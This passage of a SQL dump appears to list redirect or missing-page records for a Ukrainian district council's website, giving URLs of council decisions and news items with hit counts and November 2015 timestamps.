00:00:00',301),(18376,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/546-pro-zminu-nazvi-vorsivskoi-zosh-i-ii-stupeniv','','','',9,0,'2015-11-12 10:04:26','0000-00-00 00:00:00',301),(18377,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/571-pro-deputatskij-zapit-deputata-rajonnoi-radi_2','','','',4,0,'2015-11-12 10:04:29','0000-00-00 00:00:00',301),(18378,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/574-pro-klopotannja-pered-zhitomirskoju-oblasnoju','','','',4,0,'2015-11-12 10:04:34','0000-00-00 00:00:00',301),(18379,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/222-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_6','','','',4,0,'2015-11-12 10:04:36','0000-00-00 00:00:00',301),(18380,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/222-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_6?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:04:37','0000-00-00 00:00:00',301),(18381,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/223-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_8?tmpl=component&print=1&layout=default&page=','','','',10,0,'2015-11-12 10:04:39','0000-00-00 00:00:00',301),(18382,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/57-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2011','','','',4,0,'2015-11-12 10:04:41','0000-00-00 00:00:00',301),(18383,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/57-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2011?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:04:42','0000-00-00 00:00:00',301),(18384,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=40','','','',4,0,'2015-11-12 10:04:44','0000-00-00 00:00:00',301),(18385,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=5','','','',4,0,'2015-11-12 10:04:45','0000-00-00 00:00:00',301),(18386,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/154-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_2','','','',4,0,'2015-11-12 10:04:47','0000-00-00 00:00:00',301),(18387,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/182-pro-hid-vikonannja-programi-zabezpechennja','','','',4,0,'2015-11-12 10:04:49','0000-00-00 00:00:00',301),(18388,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/70-pro-hid-vikonannja-rajonnoi-programi-vidpochinku','','','',4,0,'2015-11-12 10:04:50','0000-00-00 00:00:00',301),(18389,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/94-pro-hid-vikonannja-programi-pidtrimki-malogo','','','',4,0,'2015-11-12 10:04:52','0000-00-00 00:00:00',301),(18390,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/95-pro-hid-vikonannja-rajonnoi-socialnoi-programi','','','',4,0,'2015-11-12 10:04:53','0000-00-00 00:00:00',301),(18391,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-?start=20','','','',12,0,'2015-11-12 10:04:55','0000-00-00 00:00:00',301),(18392,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/416-pro-vstanovlennja-mezh-silskih-naselenih-punktiv_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:04:56','0000-00-00 00:00:00',301),(18393,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/418-pro-zatverdzhennja-pereliku-pidpriemstv-shho-e','','','',4,0,'2015-11-12 10:04:58','0000-00-00 00:00:00',301),(18394,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/419-pro-zatverdzhennja-planu-dijalnosti-rajonnoi-radi','','','',4,0,'2015-11-12 10:05:00','0000-00-00 00:00:00',301),(18395,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/419-pro-zatverdzhennja-planu-dijalnosti-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:05:01','0000-00-00 00:00:00',301),(18396,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/420-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2012?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:05:03','0000-00-00 00:00:00',301),(18397,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/337-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-231?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:05:06','0000-00-00 00:00:00',301),(18398,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/353-pro-likvidaciju-ustinivskoi-zosh-i-st?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:05:13','0000-00-00 00:00:00',301),(18399,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/604-pro-nadannja-dozvolu-na-vigotovlennja-proektu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-12 10:05:18','0000-00-00 00:00:00',301),(18400,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/606-pro-hid-vikonannja-rishen-rajonnoi-radi-vid-12','','','',5,0,'2015-11-12 10:05:20','0000-00-00 00:00:00',301),(18401,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/269-pro-vnesennja-zmin-do-rajonnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:05:21','0000-00-00 00:00:00',301),(18402,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/284-pro-vikoristannja-koshtiv-shho-nadijshli-u?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:05:29','0000-00-00 00:00:00',301),(18403,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-?limitstart=0','','','',9,0,'2015-11-12 10:05:30','0000-00-00 00:00:00',301),(18404,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-?start=20','','','',8,0,'2015-11-12 10:05:32','0000-00-00 00:00:00',301),(18405,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-?limitstart=0','','','',9,0,'2015-11-12 10:06:14','0000-00-00 00:00:00',301),(18406,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-?start=5','','','',9,0,'2015-11-12 10:06:15','0000-00-00 00:00:00',301),(18407,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/783-pro-programu-socialno-ekonomichnogo-rozvitku_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:06:17','0000-00-00 00:00:00',301),(18408,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/123-pro-hid-vikonannja-rajonnoi-programi-ozdorovlennja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 10:06:25','0000-00-00 00:00:00',301),(18409,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-?start=20','','','',14,0,'2015-11-12 10:06:28','0000-00-00 00:00:00',301),(18410,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=483:-2012-2016-&catid=38&Itemid=73&lang=en','','','',4,0,'2015-11-12 10:26:01','0000-00-00 00:00:00',301),(18411,'http://malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa?tmpl=component&print=1&layout=default&page=','','','',94,0,'2015-11-12 10:29:59','0000-00-00 00:00:00',301),(18412,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=490:2011-12-02-09-02-47&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-12 10:38:56','0000-00-00 00:00:00',301),(18413,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=440:2011-10-21-16-24-47&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-12 10:38:57','0000-00-00 00:00:00',301),(18414,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=505:2011-12-16-13-24-32&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-11-12 11:04:29','0000-00-00 00:00:00',301),(18415,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&id=57:--15042014-&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-11-12 11:12:37','0000-00-00 00:00:00',301),(18417,'http://www.malyn-rayrada.org.ua/attachments/053_','','','',1,0,'2015-11-12 12:01:14','0000-00-00 00:00:00',301),(18418,'http://www.malyn-rayrada.org.ua/attachments/054_','','','',1,0,'2015-11-12 12:01:26','0000-00-00 00:00:00',301),(18419,'http://www.malyn-rayrada.org.ua/attachments/070_','','','',1,0,'2015-11-12 12:01:40','0000-00-00 00:00:00',301),(18420,'http://www.malyn-rayrada.org.ua/attachments/071_','','','',1,0,'2015-11-12 12:01:55','0000-00-00 00:00:00',301),(18421,'http://www.malyn-rayrada.org.ua/attachments/055_','','','',1,0,'2015-11-12 12:02:09','0000-00-00 00:00:00',301),(18422,'http://www.malyn-rayrada.org.ua/attachments/072_','','','',1,0,'2015-11-12 12:02:21','0000-00-00 00:00:00',301),(18423,'http://www.malyn-rayrada.org.ua/attachments/074_','','','',1,0,'2015-11-12 12:02:39','0000-00-00 00:00:00',301),(18424,'http://www.malyn-rayrada.org.ua/attachments/161_захо','','','',1,0,'2015-11-12 12:02:59','0000-00-00 00:00:00',301),(18425,'http://www.malyn-rayrada.org.ua/index.php/875-ogoloshennya','','','',38,0,'2015-11-12 12:23:12','0000-00-00 00:00:00',301),(18426,'http://www.malyn-rayrada.org.ua/index.php/187-ogoloshennja','','','',28,0,'2015-11-12 12:23:24','0000-00-00 00:00:00',301),(18427,'http://www.malyn-rayrada.org.ua/index.php/250-z-peremogoju','','','',20,0,'2015-11-12 12:23:36','0000-00-00 00:00:00',301),(18428,'http://www.malyn-rayrada.org.ua/index.php/567-ogoloshennja_4','','','',24,0,'2015-11-12 12:24:32','0000-00-00 00:00:00',301),(18429,'http://www.malyn-rayrada.org.ua/index.php/570-ogoloshennja_6','','','',57,0,'2015-11-12 12:24:55','0000-00-00 00:00:00',301),(18430,'http://www.malyn-rayrada.org.ua/index.php/593-ogoloshennja_8','','','',26,0,'2015-11-12 12:25:26','0000-00-00 00:00:00',301),(18431,'http://www.malyn-rayrada.org.ua/index.php/643-ogoloshennja_9','','','',13,0,'2015-11-12 12:25:40','0000-00-00 00:00:00',301),(18432,'http://www.malyn-rayrada.org.ua/index.php/707-ogoloshennja_12','','','',19,0,'2015-11-12 12:27:50','0000-00-00 00:00:00',301),(18433,'http://malyn-rayrada.org.ua/index.php/483-zaversheno-pidgotovku-do-17-sesii-malinskoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-12 13:08:36','0000-00-00 00:00:00',301),(18434,'http://malyn-rayrada.org.ua/index.php/499-za-materialami-zvernen-rajonnoi-radi_2','','','',7,0,'2015-11-12 13:08:40','0000-00-00 00:00:00',301),(18435,'http://www.malyn-rayrada.org.ua/index.php/20-vidbulos-zasidannja-koordinacijnoi-radi-z-pitan?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-12 13:26:46','0000-00-00 00:00:00',301),(18436,'http://malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa','','','',96,0,'2015-11-12 14:16:47','0000-00-00 00:00:00',301),(18437,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34&id=348:2011-06-15-12-35-38&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-12 15:28:17','0000-00-00 00:00:00',301),(18438,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=439:2011-10-21-16-22-19&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-12 15:28:18','0000-00-00 00:00:00',301),(18439,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=787:2012-10-15-09-13-25&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-12 15:28:18','0000-00-00 00:00:00',301),(18440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27:---1932-33-&Itemid=58&lang=uk','','','',9,0,'2015-11-12 15:56:52','0000-00-00 00:00:00',301),(18441,'http://www.malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv','','','',3,0,'2015-11-12 15:56:53','0000-00-00 00:00:00',301),(18442,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=53&layout=blog&Itemid=94&lang=ru','','','',1,0,'2015-11-12 15:59:41','0000-00-00 00:00:00',301),(18443,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=ru','','','',5,0,'2015-11-12 16:04:29','0000-00-00 00:00:00',301),(18444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=53:--25102013-&layout=blog&Itemid=94&lang=ru','','','',5,0,'2015-11-12 16:09:38','0000-00-00 00:00:00',301),(18445,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=231:2011-01-06-08-26-07&catid=11&lang=en','','','',2,0,'2015-11-12 16:20:46','0000-00-00 00:00:00',301),(18446,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=en&layout=blog&option=com_content&view=category','','','',5,0,'2015-11-12 16:52:38','0000-00-00 00:00:00',301),(18447,'http://www.malyn-rayrada.org.ua/index.php?id=59&Itemid=107&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2015-11-12 16:56:55','0000-00-00 00:00:00',301),(18448,'http://www.malyn-rayrada.org.ua/index.php/633-informacija-shhodo-vnesennja-zmin-v-bjudzhet-2013','','','',24,0,'2015-11-12 16:57:05','0000-00-00 00:00:00',301),(18450,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56:--03022014-&layout=blog&Itemid=97&lang=uk&limitstart=10','','','',2,0,'2015-11-12 20:41:00','0000-00-00 00:00:00',301),(18452,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=310:-2011-&catid=33&Itemid=66&lang=uk','','','',5,0,'2015-11-12 21:08:00','0000-00-00 00:00:00',301),(18454,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=547:-l-r-2011-2016-&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-12 21:56:39','0000-00-00 00:00:00',301),(18455,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/866-pro-pogodzhennya-zvilnennya-ta-priznachennya-na-posadi-direktoriv-shkil-rajonu','','','',6,0,'2015-11-12 23:01:17','0000-00-00 00:00:00',301),(18456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=637:2012-04-03-12-34-11&catid=42:--16052012-&Itemid=80&lang=ru','','','',2,0,'2015-11-13 00:13:01','0000-00-00 00:00:00',301),(18457,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=526:-2012-&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-13 00:55:06','0000-00-00 00:00:00',301),(18458,'http://www.malyn-rayrada.org.ua/index.php/1159-pro-sklikannya-41sesiji-rajonnoji-radi-6-sklikannya','','','',26,0,'2015-11-13 01:04:20','0000-00-00 00:00:00',301),(18459,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&id=40:--28032012-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2015-11-13 01:08:08','0000-00-00 00:00:00',301),(18460,'http://malyn-rayrada.org.ua/index.php/1220-ogoloshennya-pro-provedennya-konkursu-na-pravo-orendi-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu','','','',7,0,'2015-11-13 02:00:56','0000-00-00 00:00:00',301),(18461,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=800:-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-13 02:26:01','0000-00-00 00:00:00',301),(18462,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=864:-qq&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-13 02:39:51','0000-00-00 00:00:00',301),(18463,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31&id=275:---------------2011-&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-13 02:39:52','0000-00-00 00:00:00',301),(18464,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk&limitstart=15','','','',1,0,'2015-11-13 04:09:52','0000-00-00 00:00:00',301),(18465,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=ru&layout=blog&limitstart=25&option=com_content&view=category','','','',2,0,'2015-11-13 05:46:21','0000-00-00 00:00:00',301),(18466,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=309:----5----6--20--2011-&catid=33&Itemid=66&lang=uk','','','',4,0,'2015-11-13 06:19:54','0000-00-00 00:00:00',301),(18467,'http://www.malyn-rayrada.org.ua/index.php/816-golovne-upravlinnja-derzhzemagentstva-u','','','',43,0,'2015-11-13 06:51:47','0000-00-00 00:00:00',301),(18468,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&id=51:--19072013-&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-11-13 07:17:04','0000-00-00 00:00:00',301),(18470,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=767:2012-10-01-08-20-30&catid=11&lang=en','','','',1,0,'2015-11-13 08:05:30','0000-00-00 00:00:00',301),(18471,'http://malyn-rayrada.org.ua/index.php/720-do-vidoma-pensioneriv','','','',10,0,'2015-11-13 08:33:58','0000-00-00 00:00:00',301),(18472,'http://malyn-rayrada.org.ua/index.php?Itemid=8&id=4:2010-06-05-12-51-18&lang=ru&layout=blog&option=com_content&view=category','','','',3,0,'2015-11-13 08:40:56','0000-00-00 00:00:00',301),(18473,'http://www.malyn-rayrada.org.ua/index.php/251-vitaemo-iz-svjatom','','','',23,0,'2015-11-13 09:00:25','0000-00-00 00:00:00',301),(18476,'http://www.malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa','','','',4,0,'2015-11-13 09:50:54','0000-00-00 00:00:00',301),(18477,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=ru','','','',9,0,'2015-11-13 10:38:31','0000-00-00 00:00:00',301),(18479,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=998:1&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-13 11:49:14','0000-00-00 00:00:00',301),(18480,'http://malyn-rayrada.org.ua/index.php/884-vidbulas-koordinatsijna-rada-pri-golovi-malinskoji-rajonnoji-radi','','','',5,0,'2015-11-13 11:54:23','0000-00-00 00:00:00',301),(18481,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=uk&Itemid=','','','',1,0,'2015-11-13 12:07:06','0000-00-00 00:00:00',301),(18482,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=ru&Itemid=','','','',1,0,'2015-11-13 12:18:49','0000-00-00 00:00:00',301),(18483,'http://malyn-rayrada.org.ua/index.php/1186-q?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-13 12:27:38','0000-00-00 00:00:00',301),(18484,'http://malyn-rayrada.org.ua/index.php/1195-dibrivska-silska-rada-oprilyudnyue-informatsiyu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-13 12:27:39','0000-00-00 00:00:00',301),(18485,'http://malyn-rayrada.org.ua/index.php/1197-znyato-z-poryadku-dennogo-shche-odnu-problemu-likarni?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-13 12:27:41','0000-00-00 00:00:00',301),(18486,'http://malyn-rayrada.org.ua/index.php/1204-vidbulas-42-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-13 12:27:43','0000-00-00 00:00:00',301),(18487,'http://malyn-rayrada.org.ua/index.php/1206-ogoloshennya-pro-namiri','','','',5,0,'2015-11-13 12:27:45','0000-00-00 00:00:00',301),(18488,'http://malyn-rayrada.org.ua/index.php/1206-ogoloshennya-pro-namiri?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-13 12:27:46','0000-00-00 00:00:00',301),(18489,'http://malyn-rayrada.org.ua/index.php/549-za-materialami-zvernen-rajonnoi-radi_4','','','',2,0,'2015-11-13 12:27:50','0000-00-00 00:00:00',301),(18490,'http://malyn-rayrada.org.ua/index.php/771-golova-oda-kizin-s-v-predstaviv-aktivu-rajonu-ta','','','',5,0,'2015-11-13 12:27:55','0000-00-00 00:00:00',301),(18491,'http://malyn-rayrada.org.ua/index.php/771-golova-oda-kizin-s-v-predstaviv-aktivu-rajonu-ta?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-13 12:27:57','0000-00-00 00:00:00',301),(18492,'http://malyn-rayrada.org.ua/index.php/794-vidbulas-30-sesija-malinskoi-rajonnoi-radi','','','',3,0,'2015-11-13 12:28:16','0000-00-00 00:00:00',301),(18493,'http://malyn-rayrada.org.ua/index.php/794-vidbulas-30-sesija-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-13 12:28:18','0000-00-00 00:00:00',301),(18494,'http://malyn-rayrada.org.ua/index.php/883-vitaemo-osvityan-iz-profesijnim-svyatom','','','',5,0,'2015-11-13 12:28:28','0000-00-00 00:00:00',301),(18495,'http://malyn-rayrada.org.ua/index.php/884-vidbulas-koordinatsijna-rada-pri-golovi-malinskoji-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-13 12:28:32','0000-00-00 00:00:00',301),(18496,'http://malyn-rayrada.org.ua/index.php/885-14-zhovtnya-svyato-pokrovi-presvyatoji-bogoroditsi','','','',8,0,'2015-11-13 12:28:34','0000-00-00 00:00:00',301),(18497,'http://malyn-rayrada.org.ua/index.php/888-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-9-misyatsiv-2014-roku','','','',3,0,'2015-11-13 12:28:43','0000-00-00 00:00:00',301),(18498,'http://malyn-rayrada.org.ua/index.php/933-vidbulas-35-sesiya-rajonnoji-radi','','','',5,0,'2015-11-13 12:29:19','0000-00-00 00:00:00',301),(18499,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1208-pro-vnesennya-zmin-do-polozhennya-pro-postijni-komisiji-rajonnoji-radi','','','',6,0,'2015-11-13 12:29:37','0000-00-00 00:00:00',301),(18500,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1205-pro-zvernennya-do-kerivnitstva-dp-propan-shchodo-zabezpechennya-zhiteliv-rajonu-skraplenim-gazom','','','',8,0,'2015-11-13 12:30:34','0000-00-00 00:00:00',301),(18501,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku','','','',11,0,'2015-11-13 12:30:36','0000-00-00 00:00:00',301),(18502,'http://www.malyn-rayrada.org.ua/index.php/1000-go-malinshchina-pidtrimaemo-zemlyakiv-dopomozhimo-jim-razom?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-13 12:31:04','0000-00-00 00:00:00',301),(18503,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=ru&Itemid=','','','',2,0,'2015-11-13 12:35:33','0000-00-00 00:00:00',301),(18504,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=ru&Itemid=0','','','',4,0,'2015-11-13 12:53:46','0000-00-00 00:00:00',301),(18505,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=uk&Itemid=0','','','',2,0,'2015-11-13 13:06:22','0000-00-00 00:00:00',301),(18506,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&id=53:--25102013-&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2015-11-13 13:21:39','0000-00-00 00:00:00',301),(18507,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&id=59:--20062014-&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-11-13 13:21:40','0000-00-00 00:00:00',301),(18508,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=uk&Itemid=0','','','',4,0,'2015-11-13 13:45:51','0000-00-00 00:00:00',301),(18510,'http://www.malyn-rayrada.org.ua/index.php/1197-znyato-z-poryadku-dennogo-shche-odnu-problemu-likarni','','','',31,0,'2015-11-13 13:55:36','0000-00-00 00:00:00',301),(18511,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:------qq&catid=15&lang=ru&Itemid=','','','',4,0,'2015-11-13 14:36:59','0000-00-00 00:00:00',301),(18512,'http://www.malyn-rayrada.org.ua/index.php/463-sogodni-pravoslavni-hristijani-vidznachajut-verbnu','','','',21,0,'2015-11-13 14:40:42','0000-00-00 00:00:00',301),(18513,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:------qq&catid=15&lang=uk&Itemid=','','','',4,0,'2015-11-13 14:48:48','0000-00-00 00:00:00',301),(18514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:------qq&catid=15&lang=ru&Itemid=0','','','',4,0,'2015-11-13 15:24:28','0000-00-00 00:00:00',301),(18515,'http://www.malyn-rayrada.org.ua/index.php/1152-na-poryadku-dennomu-virishennya-problem-silskikh-gromad','','','',23,0,'2015-11-13 16:07:18','0000-00-00 00:00:00',301),(18516,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1270:2014-04-08-13-49-40&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-13 16:31:10','0000-00-00 00:00:00',301),(18517,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-?start=20','','','',8,0,'2015-11-13 18:54:43','0000-00-00 00:00:00',301),(18518,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/armia.jpg','','','',1,0,'2015-11-13 20:26:47','0000-00-00 00:00:00',301),(18519,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/20151106.jpg','','','',1,0,'2015-11-13 20:27:10','0000-00-00 00:00:00',301),(18520,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/pokrov.jpg','','','',1,0,'2015-11-13 20:27:20','0000-00-00 00:00:00',301),(18521,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/images/stories/clock.jpg','','','',1,0,'2015-11-13 20:27:28','0000-00-00 00:00:00',301),(18522,'http://www.malyn-rayrada.org.ua/index.php/479-porjadok-dennij-18-sesii-rajonnoi-radi-6','','','',14,0,'2015-11-13 20:33:54','0000-00-00 00:00:00',301),(18523,'http://malyn-rayrada.org.ua/index.php/1034-vitaemo-iz-svyatom-vesni','','','',20,0,'2015-11-13 21:17:17','0000-00-00 00:00:00',301),(18524,'http://malyn-rayrada.org.ua/index.php/1185-problemu-potribno-virishuvati-spilno','','','',14,0,'2015-11-13 21:17:19','0000-00-00 00:00:00',301),(18525,'http://www.malyn-rayrada.org.ua/index.php/1209-pishov-z-zhittya-volodimir-melnichenko','','','',21,0,'2015-11-13 21:35:20','0000-00-00 00:00:00',301),(18526,'http://www.malyn-rayrada.org.ua/index.php/456-vikonannja-dohidnoi-chastini-bjudzhetiv-za-2012','','','',14,0,'2015-11-13 22:09:15','0000-00-00 00:00:00',301),(18527,'http://www.malyn-rayrada.org.ua/index.php/48-zustrich-iz-vchiteljami?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-13 22:09:19','0000-00-00 00:00:00',301),(18528,'http://www.malyn-rayrada.org.ua/index.php/552-u-fedorivci-rozpochali-robotu-po-navedennju','','','',17,0,'2015-11-13 22:09:26','0000-00-00 00:00:00',301),(18529,'http://www.malyn-rayrada.org.ua/index.php/554-rekonstrukcii-stadionu-avangard-buti?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-13 22:09:29','0000-00-00 00:00:00',301),(18530,'http://www.malyn-rayrada.org.ua/index.php/559-i-u-ditej-ih-batkiv-ta-vchiteliv-bude-svjato?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-13 22:09:30','0000-00-00 00:00:00',301),(18531,'http://www.malyn-rayrada.org.ua/index.php/570-ogoloshennja_6?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-13 22:09:35','0000-00-00 00:00:00',301),(18532,'http://www.malyn-rayrada.org.ua/index.php/575-vidbulas-22-sesija-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-13 22:09:39','0000-00-00 